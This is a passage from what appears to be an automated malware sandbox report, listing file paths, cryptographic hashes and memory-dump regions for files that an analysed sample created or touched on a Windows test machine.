| SHA256 | 152987daf9e2b18c4f3f0ae6c2ec1ad1da0d76c5f11e1284590177cb3ae070c3 |
| SHA512 | 827de42016ef7fb04a29a4c2e5c0c0eff9df720eee1c7110443446ffc924b5b014e8056bdf4c8c782e938dd0aea7de2276c59e5f6c405d2fb4c3f765036b4bc4 |
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.0.cs
| MD5 | f8419bbc398e1a2b134eec88b333f8f6 |
| SHA1 | 57ebba4cad00272da80b919df0908ec40f9be48a |
| SHA256 | 25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3 |
| SHA512 | b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674 |
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\CSC633947E119804030A21172F9908F922A.TMP
| MD5 | e0f21690c648bc662c31d24c209c38f2 |
| SHA1 | 43a77c8a40fe2aeb7d12efa10930dda071d1dab0 |
| SHA256 | 6200a755a5c4cacfe465fb8d9bd7ee2d395c520bf8fc4fc6734106141ad277d9 |
| SHA512 | 86a2974107d7a62b41bffd1b80c809cf8055842583bd18aa10bbefa5fc23f170b48d35c94db84125bd3c8a8c42ada0b3fd91f47040bf3c7040eecdf591bcb7be |
C:\Users\Admin\AppData\Local\Temp\RESD38C.tmp
| MD5 | 98862bda729923e2cd289e2380666eaa |
| SHA1 | ccbb2681bfaaf2e1490995198654d20b2001a2aa |
| SHA256 | cb51b71bab2d3b398a6b40a46e18ea39dae544f52f31191baff0d96ad68768c0 |
| SHA512 | b6d3e39eb9bc54acec9f11da46947685b47a83bdc03be261cbf0403e692aca79b47e858c31dc26d081bcd5dba5902c77f7c688a3d01da25605f13b11b81a2a4e |
C:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.dll
| MD5 | 41b30848f411946b58a663f10fc0be62 |
| SHA1 | 3323e248929131c3e17b683dd8afd044f291d582 |
| SHA256 | 7ecd628bbea55d74e8efee1a282f312297c6dac2719790b9ce8b842b5d8035e7 |
| SHA512 | 0b5b882f7898f2adf0d06f279007c0968945652524537a495b8d1259ba152021f227069cba8c9da8cb419d2c2384ed4d9ff56fac6f85999b41304780514a0a6b |
memory/1748-64-0x0000000006CE0000-0x0000000006CE8000-memory.dmp
memory/1748-70-0x0000000070BAE000-0x0000000070BAF000-memory.dmp
memory/1748-71-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/1748-72-0x0000000070BA0000-0x0000000071350000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 318ff90d7a2797a041b836f7f8900f62 |
| SHA1 | fdda6afed7a1643ae353e7a635e6744c2b0a07d5 |
| SHA256 | 241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430 |
| SHA512 | 808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwersheLl.eXe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dcdb0a9f978252d8bd2cd5764bdc3780 |
| SHA1 | 262a1e66f72df7d2ddbcbca02bb6c6c2880e3fb7 |
| SHA256 | 6198da3e5fde7a9329829e6d334b8c915381bbc13637afbaa3ea5b4ef9bb3aca |
| SHA512 | 1a983ec785966fd21226a9ff380854f6d903d6f2b98dc70f99bd0eecb90be94c17a6ffcbc36802d2f59d18dd6d62ced83062a7313b3e9282c33b357e91b90742 |
memory/3440-81-0x00000000003C0000-0x0000000000454000-memory.dmp
memory/1748-82-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/3440-83-0x00000000052E0000-0x0000000005884000-memory.dmp
memory/3440-85-0x0000000004EE0000-0x0000000004F8A000-memory.dmp
memory/3440-84-0x0000000004D30000-0x0000000004DC2000-memory.dmp
memory/3440-86-0x00000000052A0000-0x00000000052AA000-memory.dmp
memory/3440-87-0x0000000005BB0000-0x0000000005C4C000-memory.dmp
memory/3440-88-0x0000000005D50000-0x0000000005D62000-memory.dmp
memory/3440-89-0x0000000006EF0000-0x0000000006F54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp8112.tmp
| MD5 | d109bf22c44ea7b4dbfc0454cc49b011 |
| SHA1 | 22404735770e6c90bced04a120eb545f988b1cec |
| SHA256 | 799a7ab0646451034317a499561adba7c8addc8c8e4030e5fa15fdac8a2ab02e |
| SHA512 | 8a7b0415a169ecb773e59ec6279fd04ecfb55b758e02ff04d3ff4631dab41e1534ebdfb179944946ce89222ff3baa979600e4f183527aaa6c4b6f4d881472cc8 |
memory/1660-95-0x0000000005490000-0x00000000057E4000-memory.dmp
memory/2760-105-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2760-108-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1660-119-0x0000000005B90000-0x0000000005BDC000-memory.dmp
memory/1660-123-0x000000006E9E0000-0x000000006EA2C000-memory.dmp
memory/1660-133-0x0000000006D50000-0x0000000006DF3000-memory.dmp
memory/4880-134-0x000000006E9E0000-0x000000006EA2C000-memory.dmp
memory/1660-144-0x00000000070C0000-0x00000000070D1000-memory.dmp
memory/4880-145-0x0000000007E00000-0x0000000007E14000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 664d4b00639af97613d69a4f2bafdcc1 |
| SHA1 | b6f949b2acab60d5645c41697ffaf2aabe085019 |
| SHA256 | 3ea4e1d48d263fd70736c2d249b066761071050cfd5cd7905f4b2d4d12d12e83 |
| SHA512 | 351a4b96111e76822306f77f0115826f7c0f8978bd9b633fa02f2fe1d459575a4324c2bd073a6bc50765003e58a34b2f12fa03a1357ee6e7c692c057d202121f |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |